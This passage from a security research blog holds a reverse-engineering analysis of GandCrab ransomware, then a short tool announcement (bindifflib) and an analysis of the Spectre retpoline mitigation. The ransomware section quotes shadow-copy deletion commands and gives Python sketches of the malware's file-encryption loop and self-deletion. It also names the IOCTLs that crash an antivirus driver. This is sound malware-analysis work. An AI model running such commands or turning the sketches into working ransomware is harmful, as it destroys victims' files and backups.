By sending the stolen information to several hundred domains/IPs, it is hard to block the C&C communication based on domains/IPs, because you would block a lot of benign websites, too.

If you use a network-based IDS/IPS, it is also not trivial to detect or block GandCrab traffic based on the URL, since there are a lot of randomizations in there and it is not easy to tell those URLs apart from legit URLs.

Encrypt ALL the things!

[Figure 22]

After starting the thread that calls the C&C server, the mainFunction() initializes three critical sections, of which only one is used at all. O_o

Then, with a call to the function startEncryption() at 0x00402E60, the actual encryption of files on the system starts.

[Figure 23]

In the first call, to decryptFileEndings() at 0x00402E14, a list of file endings is decrypted with the already-known XOR loop. This list is later used to exclude files from encryption based on their file ending.

The excluded file endings are:

.ani .cab .cpl .cur .diagcab .diagpkg .dll .drv .lock .hlp .ldf .icl .icns .ico .ics .lnk .key .idx .mod .mpa .msc .msp .msstyles .msu .nomedia .ocx .prf .rom .rtp .scr .shs .spl .sys .theme .themepack .exe .bat .cmd .gandcrab .KRAB .CRAB .zerophage_i_like_your_pictures
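
Applied later in encryptFile(), the check is as simple as it sounds; a sketch (the set below is just an excerpt of the full list above):

import os

EXCLUDED_ENDINGS = {".dll", ".exe", ".sys", ".lnk", ".gandcrab", ".krab", ".crab"}  # excerpt

def is_ending_blacklisted(path):
    return os.path.splitext(path)[1].lower() in EXCLUDED_ENDINGS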

As a second step, in createRSAkeypair() at 0x00404BF6, a 2048-bit RSA keypair is created. This keypair is then passed to the function I called saveKeysToRegOrGetExisting() at 0x00402B85.

[Figure 24]

There are two branches here: If the registry path “HKCU\SOFTWARE\keys_data\data” exists, the previously generated keypair is thrown away – WTF? Why generate it in the first place? – and the registry values “private” and “public” are read from said path via getKeypairFromRegistry() at 0x0040298D and used further on. Please note that the registry value “private” holds not only the private key, but a slightly more complex buffer, as you can see when looking at the second branch, in case the registry path does not exist.

The second branch is executed if the registry path does not exist: a call to encrypPubKey() at 0x00402263 is made.

[Figure 25]

First a random IV and a random key are generated – getRandomBytes() uses advapi32.CryptGenRandom(), so it is probably really random and not some pseudo-random rand() function.

Those two random values are then used to encrypt the private key with Salsa20.

The function importRSAkeyAndEncryptBuffer() imports a public RSA key and uses it to encrypt the provided buffer. Note that it is not the previously generated public key that is used here, but g_Mem_pubkey, which was decrypted at the beginning of the main function.

In order to understand what is actually encrypted by importRSAkeyAndEncryptBuffer(), it is important to know what the structure behind the outBuf pointer looks like, so here is my IDA Local Type definition:

#pragma pack(1)
struct keypairBuffer
{
DWORD privkeySize;
char salsaKey[0x100];
char IV[0x100];
char privKey[0x100];
};

You can now see that all 0x100 bytes starting at keypairBuffer->salsaKey and all 0x100 bytes of keypairBuffer->IV are encrypted, although the key is only 32 bytes and the IV only 8 bytes long, as you can see from the first argument of getRandomBytes(). GandCrab still encrypts the whole buffer, including lots of unused null bytes. ¯\_(ツ)_/¯

Yet this means that without the private key belonging to the embedded g_Mem_pubkey, you cannot decrypt the Salsa20 key and IV. And without this Salsa20 key and IV, you cannot decrypt the locally generated private RSA key.

Unfortunately, this looks like solid use of cryptography to me.

Of course, with a call to writeRegistryKeys() at 0x00402AAD, the public key of the previously generated RSA keypair is written to the registry value “public”, and the whole encrypted keypairBuffer structure is written to the registry value called “private” in the above-mentioned registry path.

Back in the startEncryption() function, as a next step the memory of the generated private RSA key is freed in order to avoid having it in clear text in memory during runtime.

Then, with a call to createUserfileOutput() at 0x004023CF, a part of the GandCrab ransom note is generated. The encrypted keypairBuffer is base64 encoded and, by using a global variable, the RC4-encrypted and base64-encoded system data previously generated in the mainFunction() is concatenated with the following strings:

---BEGIN GANDCRAB KEY---
<base64(RSAencrypted(keypairBuffer))>
---END GANDCRAB KEY---
---BEGIN PC DATA---
<base64(RC4(systemData))>
---END PC DATA---

With the subsequent call to concatUserInfoToRansomNote() at 0x00402C36 the rest of the ransom note is decrypted with the same XOR loop as before, but this time 0x10 is used as XOR key.

Within this text, the placeholder {USERID} is searched for and substituted with the previously mentioned “ransom_id” (CRC32 over the CPU name + Windows volume serial number). The {USERID} string is part of the path of the URL of GandCrab’s hidden service: “http://gandcrabmfe6mnef.onion/{USERID}”

Thus, each machine infected with GandCrab gets a unique ransom note, where the link includes the identifier of the infected machine. Additionally, the ransom note holds all information needed to decrypt a file, if you have the private key belonging to the public key that is stored within GandCrab’s .data section.

It is funny to note that concatUserInfoToRansomNote() does not use the already calculated and known ransom_id; instead, the whole previously mentioned internal structure containing information about the current system is built again, only this time with all but one of the boolean “should fill” flags unset. So the needed values are read and calculated a second time.

By calling startEncryptionsInThreads() at 0x0040211E, GandCrab starts several threads which take care of the encryption:

[Figure 26]

The first thread starts at the function encryptNetworkThread() at 0x00402097, which will be described in the next subsection.

[Figure 27]

Then, by calling prepareEncryption() at 0x00401D84, the driveInfos structure gets filled, containing the number of processors minus one (minimum one), the number of drives to encrypt and a list of drives to encrypt.

The list of drives to encrypt is filled by iterating over the alphabet (from A to Z), calling GetDriveTypeA() for each letter and checking whether the drive type is DRIVE_REMOVABLE, DRIVE_FIXED, DRIVE_CDROM or DRIVE_RAMDISK. This specifically excludes all drives of type DRIVE_REMOTE, which should already be handled by the thread running encryptNetworkThread().

Back in startEncryptionsInThreads(), after prepareEncryption() has been executed, you can see in the for-loop that for each drive, addressed by its drive letter, “number of processors minus one” threads are spawned, each calling the encryptLocalDriveThread() function at 0x00401D1C, which will be described in one of the following subsections.

The main thread then waits for all threads running on the current drive to finish by calling WaitForMultipleObjects(). As soon as one drive is finished and all corresponding threads have ended, the next drive is encrypted with the same number of threads, and so on.

At the end of the function, the main thread waits until the encryptNetworkThread()-thread has finished by calling WaitForSingleObject().

Network encryption – Im in ur network, encrypting ur sharez

The encryptNetworkThread() function at 0x00402097 does nothing more than resolve the computer’s name and provide this information, together with the crypto keys from the threadArgs structure, to the function I called enumNetworksAndEncrypt() at 0x00401EA2.

[Figure 28]

It is weird to see that the computer name is not actually used in the enumNetworksAndEncrypt() function. So maybe it was once used and the authors forgot to remove it, or it is part of an upcoming feature, which is still in development. Nonetheless, from the control flow point of view it makes no sense to query the computer name here. ¯\_(ツ)_/¯

So the actual beef we are looking for is in the function enumNetworksAndEncrypt(). The main part of this function looks like this:

[Figure 29]

The function has two parts, the upper half and the lower half, each marked by a call to WNetOpenEnumW().

In the first half, a maximum of 128 previously known network disks are enumerated by calling WNetOpenEnumW() with the RESOURCE_REMEMBERED and RESOURCETYPE_DISK arguments.

Then, for each found network resource of type DISK, the function I called loopFoldersAndEncrypt_wrapper() at 0x00401E47 is executed. For each network resource of type RESOURCEUSAGE_CONTAINER, the currently executing function enumNetworksAndEncrypt() is called recursively, in the second half of the function, to further enumerate the network resources in the found container.

The second half of the function does pretty much the same as the first half. The only two differences are that RESOURCE_GLOBALNET is used for the enumeration, in order to enumerate the whole network and not only the previously used resources, and that argument_NetResource is passed to WNetOpenEnumW(), which makes the recursive calls possible.

Note that in the first call to enumNetworksAndEncrypt() the argument_NetResource is zero, which starts the enumeration at the root of the network.

To sum it up:
GandCrab first enumerates up to 128 network disks based on all “remembered (persistent) connections”, according to MSDN, and encrypts them. Additionally, GandCrab enumerates and encrypts up to 128 network disks starting at the root of the local network. For each resource container a recursion is made.

Encrypting local drives – Im in ur machine, encrypting ur local drivez

The encryptLocalDriveThread() function at 0x00401D1C is nothing more than a wrapper around the loopFoldersAndEncrypt() function at 0x00405653, forwarding the crypto keys and the root from which the encryption should start. The function loopFoldersAndEncrypt() is not very pretty to look at, so there is no single screenshot to describe everything in one picture, but rather several smaller screenshots. The function takes three arguments: the keys needed for encryption, the current path whose files and folders are to be iterated, and a boolean value which is used to avoid iterating and encrypting everything in paths containing the string “Program Files” or “Program Files (x86)”, unless the path additionally contains the string “SQL”.

Before starting to recursively iterate over files and folders, GandCrab does some checks on the current path by calling the function at 0x0040512C.

[Figure 30]

The function has two ways of returning a value: an output parameter and the classic ret instruction with eax. If the current folder contains the string “Program Files” or “Program Files (x86)”, the pointer bProgramFiles_1 is set to “true”, thus returning the information via the output parameter.

If one of the other folders listed above is found, the function’s return value stored in bRet is set to “true” and returned via eax and a ret-instruction.

Note that GandCrab tries to ensure that the system can still be booted by excluding the folders “Boot” and “Windows”, and tries to ensure you can still pay your ransom by not encrypting the Tor Browser files. It also spares all files installed in “Program Files” or “Program Files (x86)”, unless they contain the string “SQL”, as you can see in the encryption loop later on.

Further on in loopFoldersAndEncrypt() it is then checked if the current path is in one of the special folders. If this is the case and the folder is not in “Program Files” or “Program Files (x86)”, the function returns, thus breaking the recursion and not encrypting the files in the current folder.

In the next step, GandCrab creates the ransom note for the current folder with the hard-coded string KRAB-DECRYPT.txt and the text content which was previously calculated by calling 0x004053FD. In case the ransom note already exists, GandCrab also breaks the recursion by returning.

After that, by calling the function at 0x00405525, a lock file is created by the following algorithm:

[Figure 31]

By mangling the serial number of the drive where Windows is installed with the current day, month and week, as well as some constants, a string is created which is unique to the current computer on the current day. This string is then used to create a file with the flag FILE_FLAG_DELETE_ON_CLOSE, which keeps the file alive as long as the current file handle is open. The handle is closed after the iteration step in the current folder is finished, thus deleting the file once the current folder and all its sub-folders have been encrypted. In case the file already exists, the recursion loop is broken by returning.

This mechanism is used to synchronize the different threads running in parallel, so that no two threads encrypt the same folder at the same time. In other words, the file is a marker that a thread is currently recursively running through the current folder.

Note that this only works if GandCrab is not running over midnight, because a change in wDay and wDayOfWeek will change the file name. ¯\_(ツ)_/¯

But, the creation of the ransom note already provides a synchronization token, since it breaks the recursion in case a file with the name of the ransom note is already in the current folder. Additionally, there is another mechanism to avoid encrypting the same file twice later on. 🙂

The actual recursive loop for iterating over files and folders in loopFoldersAndEncrypt() is as simple as it can be:

[Figure 32]

By using the WinAPI FindFirstFileW() (not in screenshot) and FindNextFileW(), GandCrab iterates over the content of the current folder. If a sub-folder is found, the current function calls itself recursively to iterate the sub-folder. For each file that is found, the function encryptFile() at 0x004054B8 is called.

Note that the function behaves differently if the bSQLfoldersOnly variable is set. This is the case if the current folder is in “Program Files” or “Program Files (x86)”. If the folder then contains the string “SQL”, the recursion is executed with the third argument set to “true”, which then implicitly always sets bSQLfoldersOnly to true. This ensures GandCrab does not encrypt anything in “Program Files” or “Program Files (x86)”, unless it has something to do with SQL.

Double check to encrypt only the targeted files

The function I called encryptFile() first does several checks on the current file before it actually encrypts it.

[Figure 33]

First, the current file’s name is copied and extended with the ending “.KRAB”. Then a check on the original file ending of the current file is done. Here the file ending blacklist mentioned before is used to avoid encrypting files with certain file endings.

Note that “.KRAB” is on that blacklist, so it avoids encrypting a file twice. Additionally, to keep the system running and bootable, no executables, DLLs, drivers, etc. are encrypted.

Then, by calling bIsFilenameOnBlacklist(), GandCrab checks whether the current file is on a hard-coded list of filenames.

[Figure 34]

This once again ensures that the system stays bootable – you should be able to pay your ransom after all. But since GandCrab does not want to blacklist those files by their extensions – there could be user files with those extensions – it excludes only a few specific files from encryption.

If the file name is OK and the file is at least two bytes in size, the encryption is started by calling encryptionFunc() at 0x00401AA7. After the encryption, the file is renamed to the file name with the .KRAB ending by calling MoveFileW().

The actual encryption

The actual encryption of each file takes place in encryptionFunc(). There are two function arguments: the first is the path to the file to be encrypted, and the second is a pointer to a structure I called cryptKeys, which is defined as follows:

struct cryptKeys
{
void* pubkey;
void* privkey;
void* privkeySize;
void* pubkeySize;
keypairBuffer *keypairBuffer;
};

Although the struct has several different members, only the pubkey and the pubkeySize are used here (remember that the private key buffer has already been freed at this point).

For each file to be encrypted, a function call to 0x004019F8 creates a new random IV of 8 bytes and a symmetric key for the Salsa20 algorithm of 32 bytes (not in screenshot). Those two random values are then encrypted with the previously created RSA public key and stored in the structure I called encryptionInfoBlob in the following screenshot.

[Figure 35]

GandCrab reads the file in chunks of 1 MB, adds the number of bytes read to the encryptionInfoBlob structure, encrypts the 1 MB blob, moves the file pointer back by 1 MB and writes 1 MB of encrypted data. In case less than 1 MB is read, the sizes are adapted accordingly and the loop finishes.

Once the whole file is encrypted, GandCrab adds the encryptionInfoBlob structure to the end of the file.

The structure looks like this:

struct encryptionInfoBlob
{
byte encryptedSymkey[0x100];
byte encryptedIV[0x100];
LARGE_INTEGER encryptedBytes;
};

So, each file is fully encrypted in chunks of 1 MB with Salsa20, no matter how big the file is. For each file, a new Salsa20 key and IV are randomly created and then stored at the end of the file after being encrypted with the RSA public key which was newly created during the run of GandCrab. Additionally, the number of encrypted bytes is added at the end of each file.
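
The resulting loop and file layout can be summarized in a short sketch (salsa20_encrypt() and rsa_encrypt() are hypothetical helpers; a real Salsa20 stream would additionally have to keep its keystream position across chunks):

import os, struct

CHUNK = 0x100000  # 1 MB, as in the read/seek-back/write loop above

def encrypt_file(path, rsa_pubkey):
    key, iv = os.urandom(32), os.urandom(8)  # fresh Salsa20 key/IV per file
    total = 0
    with open(path, "r+b") as f:
        while True:
            pos = f.tell()
            data = f.read(CHUNK)
            if not data:
                break
            f.seek(pos)
            f.write(salsa20_encrypt(key, iv, data))
            total += len(data)
        # trailer: the encryptionInfoBlob structure
        f.write(rsa_encrypt(rsa_pubkey, key))  # 0x100 bytes
        f.write(rsa_encrypt(rsa_pubkey, iv))   # 0x100 bytes
        f.write(struct.pack("<q", total))      # LARGE_INTEGER encryptedBytes
    os.rename(path, path + ".KRAB")  # done via MoveFileW() in the malware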

deleteShadowCopies

Once all encryption threads are finished, the control flow goes way back to the mainFunction(). Here GandCrab deletes the shadow copies of the system to ensure a victim cannot simply restore his/her files.

On Windows Vista or later GandCrab executes “wmic.exe” with the parameter “shadowcopy delete”. On Windows XP it calls “cmd.exe” with the parameter “vssadmin delete shadows /all /quiet” via ShellExecuteW().

Before returning from the mainFunction() to main(), GandCrab waits, by calling WaitForSingleObject(), for the previously spawned network thread which is trying to contact the C&C.

Ransomware with a kernel driver “exploit”

Back in main(), GandCrab calls the function I called AntiStealth() at 0x00401270. The backstory of this function seems to be a somewhat personal feud between the author(s) of GandCrab and the security vendor Ahnlab, who released a “vaccine” against GandCrab. The details can be read here: https://www.bleepingcomputer.com/news/security/gandcrab-ransomware-author-bitter-after-security-vendor-releases-vaccine-app/

Previously, when analyzing the gathering of the system information in the mainFunction(), you could see an unused string taunting Ahnlab once again, claiming a “full write-what-where condition with privelege escalation” [sic] and even providing a download link for an exploit proof of concept.

In the blog post mentioned above, the alleged GandCrab author states that the “exploit will be an reputation hole for ahnlab for years”. We’ll see about that. 🙂

First, the AntiStealth() function parses the time stamp in the PE header of “%windir%\system32\ntoskrnl.exe” and saves it for later.
Second, the device with the path “\\.\AntiStealth_V3LITE30F” is opened by calling CreateFileW(). Note that this reveals the first bug in the driver: it does not set its access rights correctly if a random process without admin privileges can open a private kernel device.

Then three heap buffers with R/W access rights are allocated by calling VirtualAlloc(), the first two of size 0x200, the third of size 0x10.

After that, GandCrab checks whether it is running as a Wow64 process, and if so, it uses the Heaven’s Gate technique to call x64 functions of ntdll. On x64 it uses NtDeviceIoControlFile(), on x86 simply DeviceIoControl(), to communicate with the kernel device.

The actual “exploit” can fit into a single screenshot:

[Figure 36]

First the IOCTL 0x82000010 is sent with the input buffer as seen above. Then a second IOCTL, 0x8200001E, is sent, which makes your system bluescreen if everything goes according to plan.

The exploit is also mentioned at https://www.fortinet.com/blog/threat-research/a-chronology-of-gandcrab-v4-x.html. In this blog post, Fortinet states that they “were able to confirm this on Ahnlab V3 Lite 3.3.46.1 with TSFltDrv.sys file version 9.6.0.5”. However, that is not correct:

The two IOCTLs are not handled in TSFltDrv.sys, but in a driver called TfFRegNt.sys, of which I analyzed version 4.6.0.1 with the SHA-256 2B07F2CA6FC566EF260D12B316249EEEBA45E6C853E5A9724149DCBEEF136839.

In its x86 variant, the driver has 275 functions as identified by IDA, and it exposes, at least, file system minifilter functionality.

The function which handles the IOCTLs is placed at 0x0040921C, and it handles the IOCTL used in the exploit like this:

[Figure 37]

Parsing the user buffer is done like this:

[Figure 38]

First, a check on the value I called bExInitializeResourceLiteSucceeded is executed. It marks whether a call to the WinAPI ExInitializeResourceLite() during the driver’s initialization was successful.

Then, by accessing the global variable I called kernelBase, which stores a copy of ntoskrnl.exe read during initialization, and by executing the function getNtoskrnTimeStamplDword() at 0x0040318E, the time stamp from the PE header of ntoskrnl.exe is extracted.

If the second DWORD of the buffer from user space is the correct time stamp, the global variable I called userBufferFirstDWORD is set to the first DWORD in the user buffer.

Comparing this functionality with GandCrab’s code, the variable userBufferFirstDWORD is now set to 0xDEADBEEF.

The second IOCTL is handled like this:

[Figure 39]

At first, the user buffer is interpreted as a structure which I called userObj. It has, besides other unimportant members, a length and a “buf”. With this information, several size and sanity checks are executed to ensure that the userObj does not exceed 0xff bytes in size. With the following function call to checkBufferRanges() at 0x0040912E, the driver ensures that userObj lies within the user-provided buffer.

[Figure 40]

Afterwards, the driver calls handleUserBuffer() at 0x00408F76 in order to process the user input.

[Figure 41]

The first two function calls map the MDL address of the IRP to a virtual address and then deserialize a string from the user buffer into a custom object which I called memObj. The memObj, as well as the mapped memory of the MDL and the second element of the userObj, are then passed to another function, which I called thisWayGoesToCrash() at 0x004052EA.

42

The first function call to findObjectInList() at 0x00406996 looks up a file handle by iterating over a driver-internal linked list, comparing the list objects based on the user input. If an object is found, the function ExAcquireResourceSharedLite_onUserBuffer() at 0x0040606A is called:

43

You might notice that the first argument of ExAcquireResourceSharedLite() is userBufferFirstDWORD, the very same value which was set with the first IOCTL.

When the function call to ExAcquireResourceSharedLite() is executed, Windows bluescreens. The crash dump analysis of Windbg looks like this:

44

Note that the first argument is 0xDEADBF23, which is close to the address 0xDEADBEEF that was the first argument of ExAcquireResourceSharedLite().

Looking at the function in ntoskrnl to see where the crash actually happened, we can see this code:

45

The area marked in red is where the crash happened. A few lines above you can see that ecx was loaded by the instruction “lea ecx, [edi+34h]”, while edi held the first function argument. So 0xDEADBEEF + 0x34 = 0xDEADBF23, which is the referenced memory address that caused the crash.

So, what is happening in Ahnlab’s driver?

With the first IOCTL, you can give the kernel driver a pointer which it expects to be an ERESOURCE pointer. With the second IOCTL, the driver tries to acquire that resource object, and thus crashes.

Is this really a “full write-what-where condition with privelege escalation” as the GandCrab authors state? In my humble opinion, no. There is no fully controllable write primitive and the exploit does not show any privilege escalation.

You can specify an arbitrary memory location on which the WinAPI ExAcquireResourceSharedLite() gets executed. So, whatever the API does with the ERESOURCE object, you can do to an arbitrary memory location.

In theory, a very skilled attacker might be able to use this to manipulate a memory address as one gadget. But without any further gadgets, it is very hard to create some kind of real working exploit out of this.

So, I would say this is rather a denial-of-service bug than a full write-what-where privilege escalation security issue.

Covering its tracks

In case the driver bug did not bluescreen the system, GandCrab tries to delete itself by calling the function deleteSelfWithTimeout() at 0x004032CE.

46

It opens a new command line process, which first calls “timeout -c 5” and then deletes the file from which GandCrab was started. After the command line process has been started, GandCrab ends itself by calling ExitProcess().

The intention of the timeout is most probably to give the current process enough time to end itself before the newly started command line tries to delete it. It is funny to note that the command “timeout” has no switch “-c”. I could not make the timeout work with “-c” on Windows XP, 7, 8 or 10. ¯\_(ツ)_/¯

Nonetheless, in all my tests the start of the new process took a few milliseconds longer than exiting the GandCrab process, which is why the deletion always worked, although it is very racy.
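
The behavior can be approximated with a few lines of Python; the exact command line is an assumption based on the description above, including the bogus “-c” switch:

  # Sketch of the self-deletion race; the exact command line is an assumption.
  import subprocess, sys

  me = sys.argv[0]
  # "timeout -c 5" fails instantly since "-c" does not exist, so the del
  # runs right away, which is why the construct is as racy as described.
  subprocess.Popen('cmd.exe /c timeout -c 5 & del "%s"' % me)
  sys.exit(0)  # GandCrab calls ExitProcess() here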

Conclusion

When analyzing GandCrab, I was fascinated by the simplicity of the malware in comparison to its efficacy. This malware does on point what it aims to do: encrypt as many files as possible as fast as possible with a strong encryption algorithm.
There is not much unnecessary code, e.g. there is no persistence mechanism to survive reboots.

One oddity that sticks out is the kernel driver exploit, which is probably intended to show off the GandCrab author(s)’ skills in order to gain a big media echo, which in turn is important to support GandCrab’s affiliate model.

One framework to build them all, one framework to name them, and in their IDBs to bind them

Authors: Luca Ebach, Tilman Frosch

Rejoice everyone, today we pushed bindifflib to our GitHub! Bindifflib is a framework to build a set of libraries with a set of different compilers, currently the compilers of Visual Studio 2010, 2013, 2015, and 2017, both 32 bit and 64 bit. After compilation, bindifflib imports all DLLs into IDA Pro and uses the Program Database (PDB) files to properly name (almost) all functions in the IDB.

We have created bindifflib out of the need to speed up our understanding of binary code dropped at our doorstep, mostly malware. Occasionally, we encounter larger binaries that smell of statically linked libraries. Figuring out which part of the binary is a library, which library specifically, and which part is actually relevant often takes time that could be spent better and is also not very exciting. Fortunately there is BinDiff! Having some functions already identified allows us to spend the time understanding the purpose of the code and the authors’ intentions, instead of first digging through the basic capabilities that follow from knowing that a certain library was used. So let’s just create some targets to diff an unknown binary against, so that we can focus our reversing efforts on the non-generic parts of the binary. Having just one library compiled by one compiler didn’t really cut it, so it was time to automate things to have a selection of likely or frequently used libraries compiled with a set of popular compilers. Naturally, one could also replace “likely” and “frequently” by “vulnerable” and head into a completely different direction that bindifflib can help with.

We consider the code more a proof of concept than a software product. Use at your own risk, we love feedback!

Find the code here: https://github.com/GDATAAdvancedAnalytics/bindifflib

In debt to Retpoline

 

The appendix was added on the 14th of February 2018, in response to comments made to me on Twitter. In this connection, “retpoline pause lfence” and “retpoline ud2” were added to the table. Other than that, only typos were fixed since the original post.

Abstract

In this blog post I explore the Retpoline mitigation that Paul Turner of Google suggested for the Spectre indirect branch variant issue [1]. A short differential side channel analysis is made along with a performance analysis. The impact of the use of a pause instruction in retpoline is discussed. Finally, I consider the technical debt that a widely deployed retpoline imposes on CPU developers.

 

How does retpoline work

This section follows the Google presentation of retpoline closely [1]. I include it because it provides the context for the remainder of this blog post. A jmp rax is turned into the following code:

 

  1. call set_up_target
  2. capture_spec:
  3.   pause
  4.   jmp capture_spec
  5. set_up_target:
  6.   mov [rsp], rax
  7.   ret

call set_up_target (1) pushes the address of capture_spec (2) onto the return stack buffer (RSB, a CPU-internal buffer used to predict returns). It also pushes the address of capture_spec (2) onto the program stack and transfers control to set_up_target (5). The mov [rsp], rax (6) overwrites the return address on the program stack, so that the subsequent ret will pop the stack and return to the original target on the architectural path. The speculative path of the return still uses the value from the RSB, and thus the CPU will speculatively execute the code starting at (2). The pause instruction is meant to relinquish pipeline resources to co-located hyperthreads and to save power if no co-located hyperthread is present. The jmp in line 4 keeps repeating the pause until the speculative execution is rolled back when the ret in line 7 finishes executing.

 

In simple terms this means the speculative path will resolve to a spinlock and thus not leak any information through a side channel. The architectural path will eventually resolve correctly and the program will run as it is supposed to.

 

Side channel analysis of retpoline

Retpoline’s architectural side channels consist of flushing an entry in the RSB, caused by the call in line 1. This information is unlikely to bring an attacker much advantage and would require an attacker to have a sufficient amount of control over the RSB. Line 6 makes a store access on the stack. This is visible to an attacker through a cache side channel, provided the attacker has sufficient control. However, it is unlikely to provide much information, given that the stack is usually used by the functions themselves. It is worth noting that any information this side channel can provide is also provided by the original jmp rax. Presumably retpoline’s stack access provides slightly less information to an attacker than the original jmp rax instruction, i.e. cache set indexing bits instead of BTB indexing bits. Line 7 is more tricky: if the CPU updates the BTB after a misprediction, the BTB side channel will be similarly useful to that of the original jmp rax. I think it is likely that the BTB is not updated until retirement, so that this side channel isn’t present. Since the pause instruction (line 3) is a CPU hint, the CPU may choose to take or ignore the hint at its discretion (more on this below). Thus, pause may or may not provide a side channel. If external power is plugged in and the hint is taken, one can see a co-located hyperthread speed up (see [2]), which is the purpose of having the pause instruction here, but certainly a side channel as well. If the CPU is running in power saving mode (e.g. an unplugged laptop), pausing provides a side channel since executing a pause instruction on two co-located hardware threads causes a delay for both, presumably through C-state interaction; see [3]. In sum, I think the side channels provided by retpoline are less valuable than the side channel provided by the original indirect branch (but they are still present).

 

Performance analysis of retpoline

A jmp rax instruction takes about 4 clock cycles to execute and predicts correctly very often. It is replaced in retpoline with a ret instruction which will always mispredict and thus executes far slower. However, unlike with hard serialization, once the ret instruction has been executed out-of-order, the CPU seems to be able to continue without a pipeline flush, thus allowing out-of-order execution to continue. This creates two corner cases: firstly, where dependencies block out-of-order execution across the indirect branch, and secondly, where there is no dependence across the indirect branch. I managed to create a sequence of instructions where retpoline was just as fast as the original unpredicted branch; this is the case when the instructions after the branch depend on the results of the instructions before the branch. Obviously, any co-located hyperthread will be more affected by the retpoline than by a predicted indirect branch, but the thread itself does not lose any cycles. At first this seems weird, but imagine completely dependent integer ALU instructions on both sides of the indirect branch: with the branch unit being completely free, both retpoline and the indirect branch will execute concurrently with the integer ALU instructions before the branch. Since the integer ALU instructions after the branch are dependent on those before the branch, they only get scheduled for execution once all prior instructions have been executed. Thus, retpoline and an indirect branch perform equally. In the case of no dependencies across the indirect branch, retpoline is slower. Retpoline will not allow the out-of-order execution to continue until the ret instruction is executed, consequently adding a penalty compared to a predicted indirect branch. In general, the longer it takes for the indirect branch to resolve, the higher the penalty of retpoline. There is also an indirect performance cost of retpoline which, in my opinion, is likely to be somewhat smaller. The call in line 1 will push a return address onto the RSB (and consequently may evict the oldest entry in the RSB), potentially causing an RSB underflow once a previous call returns. An RSB underflow will manifest itself as a negative performance impact if the evicted RSB entry causes mispredictions or stalls in unrelated code later on. For this to happen, a call stack is required that is deeper than the size of the RSB. The stall penalty of the underflow was big enough to cause Intel to add prediction for this case to the microarchitecture (for Broadwell and Skylake). If this prediction were as efficient as using the RSB, the RSB would not exist.

 

The following table presents the results of my microbenchmarking:

 

Unit: clock cycles       Mean    Std.dev  Median
jmp rsi                  350.33  95.48    346
retpoline pause          410.64  65.94    410
retpoline lfence         403.76  25.96    404
retpoline clean          402.13  19.99    402
retpoline pause lfence   406.74  64.76    404
retpoline ud2            404.29  28.70    402

The “retpoline clean” variant is without the pause instruction; in “retpoline lfence” the pause has been replaced with an lfence instruction. The results are generally not very stable over multiple runs, but the retpoline versions often end up with an average of around 400-410 cycles, with the indirect branch being around 50 clock cycles faster on average. Thus, some additional care should be taken before concluding that “retpoline pause” is slower than the others. I ran the tests with 100k observations and removed the slowest 10% of observations as a primitive noise reduction approach. The microbenchmark represents a bad case with no dependency across the indirect branch for integer instructions (add rsi, 1 and add rbx, 1, respectively) and was run on an Intel i7-6700K. While microbenchmarking is important for the arguments I will put forth in this text, it is important to note that the numbers are not reflective of the system’s overall performance: the incidence of indirect branches is relatively small, and this benchmark is manufactured to portray cases that are worse than normal scenarios. Also, the microbenchmarking completely ignores any indirect effects.

The weird case of pause

It immediately seemed weird to me to have the pause instruction in the spinlock in line 3 of retpoline. Usually we have pause instructions in spinlocks, but spinlocks execute architecturally at some point. Having a pause of 10 clock cycles on Broadwell and 100 on Skylake in the spinlock potentially pauses the architectural work that needs to be done before the return instruction can be executed. This may lead to a larger-than-necessary penalty of the spinlock. However, pause is not actually an instruction. It is a hint to the CPU, and my guess is that the hint is not taken. I ran retpoline on my Broadwell and my Skylake and compared the penalty: there was almost no difference. This is important because we would expect the different implementations of pause to give different average latencies if it were actually executed (10 clk vs. 100 clk). Another argument for pause not being executed speculatively is that pausing is connected to a VmExit. I can only guess why Intel made it possible to get a VmExit on a pause instruction. I think the most compelling reason would be to use the pause executed by a spinlock in a guest to process small work items in the hypervisor instead of just idling the CPU. This would probably also help with virtualizing hardware. If I am right about this, it would be sensible for the pause hint to actually pause only on retirement instead of pausing the CPU speculatively. Another argument is power management: the behavior of the pause instruction depends on the C-state of a co-located hyperthread. Presumably this gives us one of the two side channels described in a previous section. There is little reason why a CPU designer would pause a thread which is executing other instructions out-of-order.

 

Discussion of technical debt of retpoline

As clever as retpoline seems, I think it is fundamentally broken. Not because it does not work, but because it builds up a large amount of technical debt. Adding retpoline to a piece of software requires CPU designers to make sure that this legacy software remains compatible with new CPUs. If a company like Google applies retpoline in their infrastructure, it is fairly unproblematic: Google has a nice inventory of the software running on their systems and can make sure that software deployed on new CPUs is recompiled; consequently this poses no constraints on a CPU designer. However, if we add retpoline to a compiler, we can be sure it will be added to all kinds of software, including virtual machines, containers, specialized software, etc. These pieces of software often do not remain supported, they are poorly catalogued, and consequently, if the behavior of retpoline changes significantly, these systems may perform suboptimally, be unsafe, or even completely break. This effectively ties the hands of CPU designers as they strive to improve the CPU in the future.

 

The first concrete problem I see is the use of the pause hint: regardless of whether the pause hint is taken in retpoline or not, its non-intended use in retpoline ties the behavior of this instruction down for CPU designers in future generations of CPUs. It is worth noting here that we already have at least 3 different implementations of the pause hint in different CPUs (treated as a nop, stall 10 clks, stall 100 clks) [5]. Adding to that the complexity of the instruction I outlined above, it would be fair to assume that this instruction might need changes in future generations of CPUs. Thus, having the pause hint of retpoline scattered over software everywhere might turn out to be a bad idea in the long term. The good news here is that there probably is a good solution for this. Replacing the pause instruction with lfence will serialize the speculative path and probably even stop it from looping; effectively stopping the execution of the spinlock may free up resources for a co-located hyperthread as well as a branch execution unit for the main thread that would otherwise have been tied up by the jmp instruction in line 4. I ran some tests on Skylake and found very nearly identical performance results for pause and lfence, suggesting that this is a viable solution. It is important to note that the lfence instruction was previously documented to only serialize loads, but instead it silently serialized all instructions, which is now the documented behavior since Intel published their errata documents for the Spectre/Meltdown patches [7]. So, the mortgage on lfence is small and has already been signed.

 

